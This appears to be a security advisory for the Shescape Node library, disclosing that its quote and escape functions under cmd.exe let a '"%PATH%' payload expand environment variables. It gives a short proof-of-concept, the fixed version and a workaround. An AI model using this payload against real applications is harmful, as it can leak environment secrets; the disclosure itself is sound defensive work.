This impact users of Shescape on Windows that explicitly configure shell: 'cmd.exe'
or shell: true
using any of quote
/quoteAll
/escape
/escapeAll
.
An attacker may be able to get read-only access to environment variables. Example:
import * as cp from "node:child_process";
import { Shescape } from "shescape";
// 1. Prerequisites
const shescape = new Shescape({
shell: "cmd.exe",
// Or
shell: true, // Only if the default shell is CMD
});
// 2. Payload
const payload = '"%PATH%';
// 3. Usage
let escapedPayload;
escapedPayload = shescape.quote(payload);
// Or
escapedPayload = shescape.quoteAll([payload]);
// Or
escapedPayload = shescape.escape(payload);
// Or
escapedPayload = shescape.escapeAll([payload]);
// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);
// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable
For Shescape prior to v2.0.0, the options
object must have shell: 'cmd.exe'
or shell: undefined
and interpolation: true
.
This bug has been patched in v2.1.2 which you can upgrade to now.
If you are already using v2 of Shescape, no further changes are required. If you are using v1 of Shescape, follow the migration guide to upgrade to v2. There is no plan to release a patch compatible with v1 of Shescape.
Alternatively, users can remove all instances of % from user input before using Shescape.
{ "github_reviewed_at": "2025-03-26T14:54:22Z", "cwe_ids": [ "CWE-200" ], "nvd_published_at": "2025-03-25T23:15:36Z", "severity": "LOW", "github_reviewed": true }